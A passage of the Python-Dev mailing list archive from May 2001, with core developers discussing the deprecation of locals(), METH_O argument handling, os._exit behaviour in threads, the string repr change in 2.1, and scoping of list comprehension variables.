In-Reply-To: <E14cwQ7-0003q3-00@ute.cnri.reston.va.us>
References: <E14cwQ7-0003q3-00@ute.cnri.reston.va.us>
Message-ID: <15122.38609.553115.107831@cj42289-a.reston1.va.home.com>

Andrew Kuchling writes:
 > Looking at a bug report Fred forwarded, I realized that after
 > py-howto.sourceforge.net was set up, www.python.org/doc/howto was
 > never changed to redirect to the SF site instead.  As of this
 > afternoon, that's now done; links on www.python.org have been updated,
 > and I've added the redirect.
 > 
 > Question: is it worth blowing away the doc/howto/ tree now, or should
 > it just be left there, inaccessible, until work on www.python.org
 > resumes?

Andrew,
  It looks like I never replied to this.  It's probably dropped off
your radar, but I'd say the answer is that the files on parrot should
be discarded sooner rather than later -- when we actually manage to
work on python.org we're that much more likely to have forgetten the
redirection entirely!


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From fdrake@acm.org  Mon May 28 19:33:13 2001
From: fdrake@acm.org (Fred L. Drake, Jr.)
Date: Mon, 28 May 2001 14:33:13 -0400 (EDT)
Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases)
In-Reply-To: <001c01c0aa95$55836f60$325821c0@newmexico>
References: <LNBBLJKPBEHFEDALKOLCOEMPJEAA.tim.one@home.com>
 <200103112137.QAA13084@cj20424-a.reston1.va.home.com>
 <001c01c0aa95$55836f60$325821c0@newmexico>
Message-ID: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com>

Guido wrote:
 > Actually, I intend to deprecate locals().  For now, globals() are
 > fine.  I also intend to deprecate vars(), at least in the form that is
 > equivalent to locals().

Samuele Pedroni writes:
 > That's fine for me. Will that deprecation be already active with 2.1, e.g
 > having locals() and param-less vars() raise a warning.
 > I imagine a (new) function that produce a snap-shot of the values in the
 > local,free and cell vars of a scope can do the job required for simple 
 > debugging (the copy will not allow to modify back the values), 
 > or another approach...

  Nothing has happened on this front yet.  Should I add deprecation
notes to the docummentation while Guido is on vacation, or wait to ask
him when he gets back?  Or was this matter resolved when I wasn't
paying attention?


  -Fred

-- 
Fred L. Drake, Jr.  <fdrake at acm.org>
PythonLabs at Digital Creations


From tim.one@home.com  Tue May 29 00:42:05 2001
From: tim.one@home.com (Tim Peters)
Date: Mon, 28 May 2001 19:42:05 -0400
Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases)
In-Reply-To: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCMEPMKEAA.tim.one@home.com>

[Guido]
> Actually, I intend to deprecate locals().  For now, globals() are
> fine.  I also intend to deprecate vars(), at least in the form that is
> equivalent to locals().

[Fred L. Drake, Jr.]
>   Nothing has happened on this front yet.  Should I add deprecation
> notes to the docummentation while Guido is on vacation, or wait to ask
> him when he gets back?  Or was this matter resolved when I wasn't
> paying attention?

I advise continuing to ignore it.  Nothing was resolved, and to judge from a
trial balloon I floated on c.l.py at the time, it's not a deprecation that
will be greeted with enthusiasm.  The problems range from people doing

def f(...):
     ...
     print "..." % locals()

to people mutating locals() at module level because they simply don't
understand that globals() is the same (but correct) thing to use there.

Due to the first example, and as Samuele may <wink> have already suggested,
we at least need to implement a mapping object capturing name bindings
before we can even think about deprecating locals() for real.


From tim.one@home.com  Tue May 29 01:01:33 2001
From: tim.one@home.com (Tim Peters)
Date: Mon, 28 May 2001 20:01:33 -0400
Subject: [Python-Dev] strop vs. string
In-Reply-To: <3B1214B3.9A4C295D@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEPPKEAA.tim.one@home.com>

[Tim]
> Wait for what?  If it were possible, is the chance that you'd
> take time to rework unicodeobject.c to "subclass from a generic
> abstract string object" greater than 0?  The chance that I
> would is exactly 0.

[MAL]
> Well, that's hard to say. It would certainly be low-priority;
> same for the above refactoring.

I think you must have missed this when it first came up here:  /F suggested
that *he* had a non-zero chance of implementing his suggestion.  That makes
it far closer to reality than anything that's been suggested since <wink>.


From tim.one@home.com  Tue May 29 01:42:54 2001
From: tim.one@home.com (Tim Peters)
Date: Mon, 28 May 2001 20:42:54 -0400
Subject: [Python-Dev] Special-casing "O"
In-Reply-To: <3B121814.E5E9896A@lemburg.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEAAKFAA.tim.one@home.com>

[MAL]
> If we end up only optimizing the re.match("O+") case, we wouldn't need
> the METH_SPECIAL masks; a simple METH_OBJARGS flag would do the trick
> and Martin could call the underlying API with one or more PyObject*
> taken directly from the Python VM stack.

How then does the callee know it was called with the correct # of arguments?
By adding enough pointer arguments to cover the longest possible O+ string
plus 1, then verifying that the one just beyond the last one it expects is
NULL, while the ones before that are not?  Adding another "# of arguments"
member to the method table?  Inventing METH_O, METH_OO, METH_OOO, ...?

> In that case, please consider at least supporting "O", "OO" and "OOO"
> with optional arguments treated like I suggested in an earlier
> posting (simply pass NULL and let the API take care of assigning
> a default value).
>
> This would take care of most builtins:

You don't have to convince me that cases other than plain "O" exist.  What's
missing is data in support of the idea that calls to those are relatively
frequent enough that it's a NET win to slow plain "O" in order to speed the
additional cases when they happen.  For example, it's not possible for calls
to reduce() to have a high hit rate in real life, because builtin_reduce is
a very expensive function -- there's only so many of those you can cram into
a second even if the calling overhead is 0.  OTOH, add a single branch to
the time it takes to find builtin_type and you've slowed its *total*
execution time significantly.

The implementation of METH_O alone is a pure win by any measure.  So would
be implementing METH_OO alone, or METH_OOO alone, etc.  Mix them, and they
all get slower than they could have been.  All the data we have says METH_O
is the single most important case, and that jibes with common sense, so I
believe it.

If you want to speed everything, fine, do that, but that likely requires a
preprocessing phase so that type signatures don't have to be resolved at
runtime at all.  So long as we're just looking at simple hacks, "the simpler
the better" is good advice and should rule in the absence of compelling
evidence against it.


From tim.one@home.com  Tue May 29 02:14:16 2001
From: tim.one@home.com (Tim Peters)
Date: Mon, 28 May 2001 21:14:16 -0400
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEABKFAA.tim.one@home.com>

[Martin v. Loewis]
> ...
> Because it is a METH_OLDARGS method, you can do
>
> f=open("/tmp/x","w")
> f.writelines("foo\n","bar\n")
>
> With my upcoming patches, I'd replace this with METH_O, making this
> call illegal. Does anybody see a problem with that change in
> semantics?

Guido won't, and if he had even a twinge of doubt, Thomas's explanation of
how this bug was introduced in 2.0 would erase it.  The list.append() docs
were arguably unclear when that brouhaha hit, but there's nothing unclear
about the file.writelines() docs.

OTOH, the file.writelines() docs still say a list is required, not "a
sequence" as the 2.0 (+ current) code actually implements.

Hmm.  Wonder whether writelines() should be generalized to allow an iterable
object?


From tim.one@home.com  Tue May 29 02:49:29 2001
From: tim.one@home.com (Tim Peters)
Date: Mon, 28 May 2001 21:49:29 -0400
Subject: [Python-Dev] Killing threads
In-Reply-To: <20010524045938.5228199C83@waltz.rahul.net>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEADKFAA.tim.one@home.com>

[Aahz]
> (This got brought up because I experimented with os._exit() as a
> possible solution, but that GPFs on Win98SE.)

[TIm]
> Please open a bug report on that, then, with a tiny test case
> if possible.
> This worked fine on Win98SE for me just now:

[Aahz]
> Futz.  *Now* it works.  <sigh>

Now *what* works?  The test case I posted, or the original test case you
tried (which you didn't post)?

> Chalk it up to another unreproducible bug caused by an unstable Win98.

Actually doubt it -- threads are very reliable on Win98, despite that little
else is (malloc() is flaky, popen() is a nightmare, etc).

Here's a recent bug report on a Red Hot box that may be related:

http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735

I have no idea what's supposed to happen if you call os._exit from a
*spawned* thread (perhaps that's what you did too?  I did not) -- threads
are outside the scope of the C std, so I suppose it's a x-platform
crapshoot.


From greg@cosc.canterbury.ac.nz  Tue May 29 03:12:55 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Tue, 29 May 2001 14:12:55 +1200 (NZST)
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
In-Reply-To: <200105280740.f4S7esP01223@mira.informatik.hu-berlin.de>
Message-ID: <200105290212.OAA01138@s454.cosc.canterbury.ac.nz>

"Martin v. Loewis" <martin@loewis.home.cs.tu-berlin.de>

> I took a special look at METH_OLDARGS occurrences.

Shouldn't all these be removed? I would have thought
list.append was the last one!

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From greg@cosc.canterbury.ac.nz  Tue May 29 03:33:58 2001
From: greg@cosc.canterbury.ac.nz (Greg Ewing)
Date: Tue, 29 May 2001 14:33:58 +1200 (NZST)
Subject: [Python-Dev] Deprecating locals() (was Re: nested scopes and global: some corner cases)
In-Reply-To: <15122.39401.621215.978215@cj42289-a.reston1.va.home.com>
Message-ID: <200105290233.OAA01143@s454.cosc.canterbury.ac.nz>

Samuele Pedroni writes:
> I imagine a (new) function that produce a snap-shot of the values in the
> local,free and cell vars of a scope can do the job required for simple 
> debugging

I think there should be methods operating directly
on stack frames for debuggers to use.

Greg Ewing, Computer Science Dept, +--------------------------------------+
University of Canterbury,	   | A citizen of NewZealandCorp, a	  |
Christchurch, New Zealand	   | wholly-owned subsidiary of USA Inc.  |
greg@cosc.canterbury.ac.nz	   +--------------------------------------+


From jepler@mail.inetnebr.com  Tue May 29 03:32:05 2001
From: jepler@mail.inetnebr.com (Jeff Epler)
Date: Mon, 28 May 2001 21:32:05 -0500
Subject: [Python-Dev] Killing threads
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEADKFAA.tim.one@home.com>; from tim.one@home.com on Mon, May 28, 2001 at 09:49:29PM -0400
References: <20010524045938.5228199C83@waltz.rahul.net> <LNBBLJKPBEHFEDALKOLCKEADKFAA.tim.one@home.com>
Message-ID: <20010528213205.A1236@localhost.localdomain>

On Mon, May 28, 2001 at 09:49:29PM -0400, Tim Peters wrote:
> Here's a recent bug report on a Red Hot box that may be related:
> 
> http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735
> 
> I have no idea what's supposed to happen if you call os._exit from a
> *spawned* thread (perhaps that's what you did too?  I did not) -- threads
> are outside the scope of the C std, so I suppose it's a x-platform
> crapshoot.

I wrote that program after the first go-round about _exit and threads,
and when I got behavior I didn't expect, I entered it in the SF bug
tracker.

My reasoning: The documentation for _exit() says it is "used to exit the
child process after a fork()", and my model for thinking about threads
is that they're "child processes, but ...".  Thus, invoking os._exit()
in a thread made sense to me, meaning "ask the OS to destroy this thread
now, but leave my file descriptors, etc., alone for the other threads."

Your suggestion in the tracker of writing the equivalent C program is a
good one, though my suspicion (which I did not voice in the SF report)
was that perhaps the thread which called _exit() held the GIL, in which
case it was in some sense Python's fault that execution didn't continue.
In any case, I don't have the faintest idea how to program threads in
C/pthreads, so I can't write the "equivalent C program".

In fact, a traceback from the hung "sleep(1)" thread shows

(gdb) where
#0  0x4008c656 in __sigsuspend (set=0xbffff5b0) at ../sysdeps/unix/sysv/linux/sigsuspend.c:45
#1  0x4002ee39 in __pthread_wait_for_restart_signal (self=0x400387c0) at pthread.c:934
#2  0x4002b05c in pthread_cond_wait (cond=0x80cf5cc, mutex=0x80cf5d8) at restart.h:34
#3  0x08067ba0 in PyThread_acquire_lock () at eval.c:41
#4  0x08051ff1 in PyEval_RestoreThread () at eval.c:41
#5  0x40019ef9 in floatsleep () at eval.c:41
#6  0x400193fd in time_sleep () at eval.c:41
[...]

While those line numbers look a little fishy (eval.c:41 for all three
frames?), I think this might support my supposition.

Of course, if os._exit() has no intended use in a threaded program, then
this behavior is as good as any.  <wink>

Jeff


From tim.one@home.com  Tue May 29 05:03:38 2001
From: tim.one@home.com (Tim Peters)
Date: Tue, 29 May 2001 00:03:38 -0400
Subject: [Python-Dev] Killing threads
In-Reply-To: <20010528213205.A1236@localhost.localdomain>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEAGKFAA.tim.one@home.com>

[Jeff Epler, on
 http://sf.net/tracker/?group_id=5470&atid=105470&func=detail&aid=426735
]
> My reasoning: The documentation for _exit() says it is "used to exit the
> child process after a fork()", and my model for thinking about threads
> is that they're "child processes, but ...".  Thus, invoking os._exit()
> in a thread made sense to me, meaning "ask the OS to destroy this thread
> now, but leave my file descriptors, etc., alone for the other threads."

You need a Linux expert to address this.  Threads and processes are
different beasts under most flavors of Unix, but Linux confuses them; I've
no idea how _exit() is supposed to work there, and that's why I asked (in
the bug report) what the Linux docs say about that (_exit() is supplied by
your local C library; Python just wraps it).

If what you really wanted was just to abort the thread, use thread.exit()
(aee the thread docs).  os._exit() is a dangerous thing even in the best of
conditions; unsure why the Python docs suggest using it.

> Your suggestion in the tracker of writing the equivalent C program is a
> good one, though my suspicion (which I did not voice in the SF report)
> was that perhaps the thread which called _exit() held the GIL, in which
> case it was in some sense Python's fault that execution didn't continue.

Ah, makes sense!  Yes, I bet that's what's happening.  If so, there's
nothing Python can do about it:  I'm afraid you did it to yourself.  _exit()
specifically asks that no cleanup processing be done, and when Python calls
it Python never regains control.  If you had done an actual fork, fine, the
*process* doing the _exit() would never come back to Python, but the GIL in
that process has nothing to do with the GIL in the parent process.  But
threads share the same GIL, and if you _exit() from a thread holding the GIL
then no other thread can ever run again.

Looks like it's also platform-dependent:  on Windows, _exit() kills the
process and every thread ever spawned by that process.  Since C doesn't say
anything about threads, that can't be called right or wrong.  Looks like on
Linux _exit() only kills the thread that calls it.

> ...
> Of course, if os._exit() has no intended use in a threaded program,

Right, it wasn't -- unless your program panics and wants to get out ASAP no
matter what the consequences.

> then this behavior is as good as any.  <wink>

And better than most <heh>.


From tim.one@home.com  Tue May 29 05:16:46 2001
From: tim.one@home.com (Tim Peters)
Date: Tue, 29 May 2001 00:16:46 -0400
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
In-Reply-To: <200105290212.OAA01138@s454.cosc.canterbury.ac.nz>
Message-ID: <LNBBLJKPBEHFEDALKOLCIEAHKFAA.tim.one@home.com>

[Martin]
> I took a special look at METH_OLDARGS occurrences.

[GregE]
> Shouldn't all these be removed? I would have thought
> list.append was the last one!

I count 42 of them remaining, usually for 0-argument functions.
METH_OLDARGS is faster than METH_VARARGS in that case, and the callee can
distinguish between "called with nothing" and "called with something" under
OLDARGS.  However, they don't appear to catch keyword args:

>>> {}.clear(2)  # complains
Traceback (most recent call last):
  File "<stdin>", line 1, in ?
TypeError: function takes no arguments
>>> {}.clear(val=12, hohoho=666)  # accepts nonsense silently
>>>

the-more-you-look-the-messier-it-gets-ly y'rs  - tim


From tim.one@home.com  Tue May 29 07:06:19 2001
From: tim.one@home.com (Tim Peters)
Date: Tue, 29 May 2001 02:06:19 -0400
Subject: [Python-Dev] Python 2.1.1
In-Reply-To: <15116.31871.122265.883855@anthem.wooz.org>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEAMKFAA.tim.one@home.com>

ESR> Apparently the Universe is an even more random place than I
ESR> thought.

[Barry A. Warsaw]
> here's-where-the-timbot-explains-that-it's-only-pseudo-random-ly y'rs,

That's what Einstein believed (i.e., that it isn't truly random).
Unfortunately, according to another recent thread, Einstein was afraid to
use equations because he didn't want to cut Stephen Hawking's editor's penis
in half -- or something like that.  Whichever, consensus still holds that
Einstein lost this one.

i'd-take-time-to-prove-him-right-but-there's-some-mangled-whitespace-
    crying-for-help-ly y'rs  - tim


From tim.one@home.com  Tue May 29 07:15:07 2001
From: tim.one@home.com (Tim Peters)
Date: Tue, 29 May 2001 02:15:07 -0400
Subject: [Python-Dev] RE: What happened to Idle's extend.py?
In-Reply-To: <f9b3eae9.0105231419.7d093237@posting.google.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCEEANKFAA.tim.one@home.com>

Guido's on vacation.  Anyone have an answer for this?  I don't, and can't
make time to dig into now.

If you can, David's address showed up as mailto:boogiemorg@aol.com

> -----Original Message-----
> From: python-list-admin@python.org
> [mailto:python-list-admin@python.org]On Behalf Of David Morgenthaler
> Sent: Wednesday, May 23, 2001 6:20 PM
> To: python-list@python.org
> Subject: What happened to Idle's extend.py?
>
>
> Idle-0.3, shipped with Python 1.5.2 had an extend.py module that was
> used to extend Idle. We've used this extensively, building entire
> "applications" as Idle extensions.
>
> Now that we're moving to Python 2.1, we find the same old directions
> for extending Idle (in extend.txt), but there appears to be no
> extend.py in Idle-0.8.
>
> Does anyone know how we can add extensions to Idle-0.8?
>
> Thanks in advance,
> David
> --
> http://mail.python.org/mailman/listinfo/python-list


From mwh@python.net  Tue May 29 09:00:42 2001
From: mwh@python.net (Michael Hudson)
Date: Tue, 29 May 2001 09:00:42 +0100 (BST)
Subject: [Python-Dev] file.writelines("foo\n","bar\n")
In-Reply-To: <LNBBLJKPBEHFEDALKOLCIEAHKFAA.tim.one@home.com>
Message-ID: <Pine.SOL.4.33.0105290854520.24723-100000@yellow.csi.cam.ac.uk>

On Tue, 29 May 2001, Tim Peters wrote:

> [Martin]
> > I took a special look at METH_OLDARGS occurrences.
>
> [GregE]
> > Shouldn't all these be removed? I would have thought
> > list.append was the last one!
>
> I count 42 of them remaining, usually for 0-argument functions.

There are more than that; PyMethodDefs that don't put anything in that
slot in the source are METH_OLDARGS too, and there are quite a few of them
in Modules/ (there are *lots* in _cursesmodule.c, but also in many of the
older modules - gl, rotor were easy to find).  There are also quite a lot
of functions that put literal zeros there, too.

So METH_OLDARGS is far from dead, sadly.

Cheers,
M.


From tim.one@home.com  Tue May 29 09:04:48 2001
From: tim.one@home.com (Tim Peters)
Date: Tue, 29 May 2001 04:04:48 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105211703.f4LH3xD01154@mira.informatik.hu-berlin.de>
Message-ID: <LNBBLJKPBEHFEDALKOLCAEBBKFAA.tim.one@home.com>

[from Monday, May 21, 2001 1:04 PM]

[Tim]
>> Unfortunately, it's 4 calls, as PyErr_Occurred() isn't a leaf.

[Martin v. Loewis]
> Any reason why PyThreadState_GET isn't used there?

Perhaps somebody's shift key got jammed?

sure-don't-see-a-good-reason-ly y'rs  - tim


From thomas@xs4all.net  Tue May 29 10:52:01 2001
From: thomas@xs4all.net (Thomas Wouters)
Date: Tue, 29 May 2001 11:52:01 +0200
Subject: [Python-Dev] Re: string repr in 2.1 (fwd)
Message-ID: <20010529115201.J676@xs4all.nl>

Robin apparently ran into a real problem caused by the change in string
repr() semantics. Now, arguably this is his own stupid fault <wink> (and
indeed he argues that himself) but that doesn't mean we shouldn't take this
into account. We could, for instance, revert 2.1.1 to the old behaviour,
giving at least *someone* a reason to switch to 2.1.1 ;) Or we could decide
what the string repr() change really wanted was just for the REPL to print
it like this, in which case the displayhook should fix it, not string_repr.

Opinions ? Ping, IIRC, this was your proposal, so yours would be especially
valuable ;)

----- Forwarded message from Robin Becker <robin@jessikat.fsnet.co.uk> -----

Date: Tue, 29 May 2001 09:58:49 +0100
From: Robin Becker <robin@jessikat.fsnet.co.uk>
To: Thomas Wouters <thomas@xs4all.net>
Cc: python-list@python.org
Subject: Re: string repr in 2.1

In message <20010529102414.P690@xs4all.nl>, Thomas Wouters
<thomas@xs4all.net> writes
>On Tue, May 29, 2001 at 12:47:39AM +0100, Robin Becker wrote:
>> In article <slrn9h5m4o.1hk.scarblac@pino.selwerd.nl>, Remco Gerlich
>> <scarblac@pino.selwerd.nl> writes
>
>> >Since 2.1, string repr uses heximal escapes instead of octal ones.
>
>> yes I guess all those *nix tools that like octal should be whipped and
>> made to obey the malevolent dictator.
>
>Do you have tools you use to parse quoted (repr'd) Python strings that
>handle octal correctly, but don't handle \x and \n\r escape codes ? Which
>ones ? And were you aware that they were going to break sooner or later,
>just because someone can prefer 'readable' escape codes and feed it that
>instead ? :)
>
Yes I have such tools. One is called Acrobat Reader, another is
traditional sed and awk. My dos grep doesn't seem to like hex, I suppose
I must update it and all other tools. 
 
My C compiler understands octal and the newer ones do hex as well.

I can read octal and do arithmetic in it probably easier than hex. I
don't defend the octal representation it's just very widespread in the
older tools. Our usage of repr was probably stupid as clearly repr can
change. 

How I long for my 18-bit PDP-15 :) what happened to my 15 octal digit
cdc! Oh woe is me! Where are the duo-decimal calculators of yore? 
-- 
Robin Becker


----- End forwarded message -----

-- 
Thomas Wouters <thomas@xs4all.net>

Hi! I'm a .signature virus! copy me into your .signature file to help me spread!


From akuchlin@mems-exchange.org  Tue May 29 15:04:37 2001
From: akuchlin@mems-exchange.org (Andrew Kuchling)
Date: Tue, 29 May 2001 10:04:37 -0400
Subject: [Python-Dev] Removing doc/howto on python.org
In-Reply-To: <15122.38609.553115.107831@cj42289-a.reston1.va.home.com>; from fdrake@acm.org on Mon, May 28, 2001 at 02:20:01PM -0400
References: <E14cwQ7-0003q3-00@ute.cnri.reston.va.us> <15122.38609.553115.107831@cj42289-a.reston1.va.home.com>
Message-ID: <20010529100437.A15638@ute.cnri.reston.va.us>

On Mon, May 28, 2001 at 02:20:01PM -0400, Fred L. Drake, Jr. wrote:
>  It looks like I never replied to this.  It's probably dropped off
>your radar, but I'd say the answer is that the files on parrot should
>be discarded sooner rather than later -- when we actually manage to

Done.  Out of paranoia about doing 'rm -rf' within www.python.org's
tree, the files aren't deleted; instead I just moved them to my home
directory on parrot.

--amk


From aahz@rahul.net  Tue May 29 16:47:13 2001
From: aahz@rahul.net (Aahz Maruch)
Date: Tue, 29 May 2001 08:47:13 -0700 (PDT)
Subject: [Python-Dev] Killing threads
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEADKFAA.tim.one@home.com> from "Tim Peters" at May 28, 2001 09:49:29 PM
Message-ID: <20010529154713.11F8E99C80@waltz.rahul.net>

Tim Peters wrote:
> 
> [Aahz]
> > Futz.  *Now* it works.  <sigh>
> 
> Now *what* works?  The test case I posted, or the original test case you
> tried (which you didn't post)?

My original test case.  I didn't actually preserve it, so the code below
was my attempt to reconstruct it (but I think it's pretty close to the
test case I tried).  Don't worry, if I run into this again, I'll be
*much* more careful about preserving the evidence and fiddling with
variations; last time I just assumed it was pilot error.

from threading import Thread
import os

class Foo(Thread):
    def run(self):
        while 1:
            pass

f = Foo()
f.start()
os._exit(1)


From beazley@cs.uchicago.edu  Tue May 29 17:56:09 2001
From: beazley@cs.uchicago.edu (David Beazley)
Date: Tue, 29 May 2001 11:56:09 -0500 (CDT)
Subject: [Python-Dev] Iteration variables and list comprehensions
Message-ID: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>

I'm not sure if this has ever been brought up before (I don't recall
seeing it), but I would like to throw out something that has been
bugging me about list comprehensions for quite some time...

First of all, I have to say that I've really grown to like list
comprehensions a lot.  In fact, I find myself using them in just about
every Python program I've been writing since switching to Python 2.0.
However, I've also been shooting myself in the foot a little more than
usual due to the following issue:

When I write a list comprehension like this:

    s = [ expr(x) for x in t ]

it is *VERY* easy to overlook the fact that the iteration variable "x"
is evaluated in the local scope (and replaces any previous binding
to "x" that might have existed outside the context of the list
comprehension).    Because of this, I have frequently found myself
debugging the following programming error:

   # Some loop
   for x in r:
       ...
       # bunch of statements
       ...
       s = [expr(x) for x in t]
       ...
       # Try to do something with x.
       # ???? What in the hell is wrong with my program ????
       ...

The main problem is that I conceptually tend to think of the list
comprehension as being some kind of list operator where the index name
is really one of the operands in some sense.  Because of this, it is
*VERY* easy to get in the habit of throwing list comprehensions all
over the place, each of which uses a common index name like x,i,j,
etc.  Of course, this works just fine until you forget that you're
also using x,i,j for some kind of loop variable someplace else :-).

Therefore, I'm wondering if it would make any sense to make the
iterator variables used inside of a list comprehension private in some
manner--either through name mangling or some other technique? For
example:

   s = [expr(x) for x in t]

would get expanded into something roughly like this:

   s = [ ]
   for _mangled_x in t:
       s.append(expr(_mangled_x))
   del _mangled_x

Just as an aside, I have never intentionally used the iterator
variable of a list comprehension after the operation has completed. I
was actually quite surprised with this behavior the first time I saw
it.  I suspect most other programmers would not anticipate this side
effect either.

Comments?

Cheers,

Dave


From nas@python.ca  Tue May 29 18:01:41 2001
From: nas@python.ca (Neil Schemenauer)
Date: Tue, 29 May 2001 10:01:41 -0700
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Tue, May 29, 2001 at 11:56:09AM -0500
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>
Message-ID: <20010529100141.B18974@glacier.fnational.com>

David Beazley wrote:
> Just as an aside, I have never intentionally used the iterator
> variable of a list comprehension after the operation has completed.

I've been bitten by this one once.  It took a while to figure out
the problem.  I'm not sure that we can change it now though.

  Neil


From skip@pobox.com (Skip Montanaro)  Tue May 29 20:03:47 2001
From: skip@pobox.com (Skip Montanaro) (Skip Montanaro)
Date: Tue, 29 May 2001 14:03:47 -0500
Subject: [Python-Dev] [Stackless] Stackless for 2.1: Progress Report (fwd)
Message-ID: <15123.62099.473259.545781@beluga.mojam.com>

--RlpqOaIB3+
Content-Type: text/plain; charset=us-ascii
Content-Description: message body text
Content-Transfer-Encoding: 7bit


I pass this along in case anyone here has some ideas for Jeff about how to
workaround his problems with pyexpat.c.

Skip


--RlpqOaIB3+
Content-Type: message/rfc822
Content-Description: forwarded message
Content-Transfer-Encoding: 7bit

Return-Path: <stackless-admin@starship.python.net>
Received: from wormwood.pobox.com (wormwood.pobox.com [208.210.125.20])
	by manatee.mojam.com (8.11.0/8.11.0) with ESMTP id f4TI9G123689
	for <skip@manatee.mojam.com>; Tue, 29 May 2001 13:09:17 -0500
Received: from wormwood.pobox.com (localhost.pobox.com [127.0.0.1])
	by wormwood.pobox.com (Postfix) with ESMTP id 2049572551
	for <skip@manatee.mojam.com>; Tue, 29 May 2001 14:09:03 -0400 (EDT)
Received: from potrero.mojam.com (ns2.mojam.com [207.20.37.91])
	by wormwood.pobox.com (Postfix) with ESMTP id 70F5572564
	for <skip@pobox.com>; Tue, 29 May 2001 14:08:59 -0400 (EDT)
Received: from starship.python.net (IDENT:qmailr@starship.python.net [63.102.49.32])
	by potrero.mojam.com (8.9.3/8.9.3) with SMTP id LAA32476
	for <skip@mojam.com>; Tue, 29 May 2001 11:09:10 -0700
Received: (qmail 21745 invoked from network); 29 May 2001 18:09:01 -0000
Received: from unknown (HELO starship.python.net) (127.0.0.1)
  by localhost with SMTP; 29 May 2001 18:09:01 -0000
Delivered-To: stackless@starship.python.net
Received: (qmail 21719 invoked from network); 29 May 2001 18:08:36 -0000
Received: from unknown (HELO rampart.timecastle.net) (64.6.34.129)
  by starship.python.net with SMTP; 29 May 2001 18:08:36 -0000
Received: from taupro.com (226-72-dltx.hpnc.com [216.88.72.226])
	by rampart.timecastle.net (8.9.3/8.8.7) with ESMTP id NAA17483;
	Tue, 29 May 2001 13:08:31 -0500
Message-ID: <3B13E514.21871F19@taupro.com>
X-Mailer: Mozilla 4.76 [en] (X11; U; Linux 2.2.16-3tau i586)
X-Accept-Language: en
MIME-Version: 1.0
References: <3B0A7606.603029F5@taupro.com> <3B0A83F2.2BC22C2@tismer.com> <3B0CB3F4.54BDE760@taupro.com> <3B0D21E4.EA7CCA3F@tismer.com> <3B10CC36.B33589E5@taupro.com>
Content-Type: text/plain; charset=us-ascii
Errors-To: stackless-admin@starship.python.net
X-BeenThere: stackless@starship.python.net
X-Mailman-Version: 2.0.3
Precedence: bulk
List-Help: <mailto:stackless-request@starship.python.net?subject=help>
List-Post: <mailto:stackless@starship.python.net>
List-Subscribe: <http://starship.python.net/mailman/listinfo/stackless>,
	<mailto:stackless-request@starship.python.net?subject=subscribe>
List-Id: The Stackless Python Mailing List <stackless.starship.python.net>
List-Unsubscribe: <http://starship.python.net/mailman/listinfo/stackless>,
	<mailto:stackless-request@starship.python.net?subject=unsubscribe>
List-Archive: <http://starship.python.net/pipermail/stackless/>
From: Jeff Rush <jrush@taupro.com>
Sender: stackless-admin@starship.python.net
To: Christian Tismer <tismer@tismer.com>, stackless@starship.python.net
Subject: [Stackless] Stackless for 2.1: Progress Report
Date: Tue, 29 May 2001 13:06:12 -0500

The port is pretty much done, and it passes the standard
Python regression tests, except for the three XML ones.
On those it executes an invalid bytecode and later,
segfaults.

The cause is some code in pyexpat.c that does a PyFrame_New,
passing in a *dummy* codeblock (gross!) that actually
points to an empty text string (instead of real bytecodes),
just to have a codeblock to call PyEval_CallObject() with.

<sigh>

I'm trying to find a workaround for that.

Does anyone have/want to create some regression tests
for Stackless?

-Jeff Rush
_______________________________________________
Stackless mailing list
Stackless@starship.python.net
http://starship.python.net/mailman/listinfo/stackless


--RlpqOaIB3+--


From gward@python.net  Tue May 29 22:21:55 2001
From: gward@python.net (Greg Ward)
Date: Tue, 29 May 2001 17:21:55 -0400
Subject: [Python-Dev] Iteration variables and list comprehensions
In-Reply-To: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>; from beazley@cs.uchicago.edu on Tue, May 29, 2001 at 11:56:09AM -0500
References: <15123.54441.925351.439879@gargoyle.cs.uchicago.edu>
Message-ID: <20010529172155.A8737@gerg.ca>

On 29 May 2001, David Beazley said:
> Therefore, I'm wondering if it would make any sense to make the
> iterator variables used inside of a list comprehension private in some
> manner--either through name mangling or some other technique? For
> example:

Two ideas occur to me:
  * make the list comprehension a new scoping level, which of course
    is doable now that we have sensible scoping semantics.  Presumably
    the usual warning message about shadowing variables from an
    outer scope will apply; you'll still have the bug in your code,
    but at least Python will tell you about it

  * don't make list comprehensions a separate scope, but add a
    little trickery so that something *like* the "shadowing variable
    from an outer scope" message is emitted

Haven't really thought about backwards compatibility issues...

        Greg


From paulp@ActiveState.com  Tue May 29 22:55:03 2001
From: paulp@ActiveState.com (Paul Prescod)
Date: Tue, 29 May 2001 14:55:03 -0700
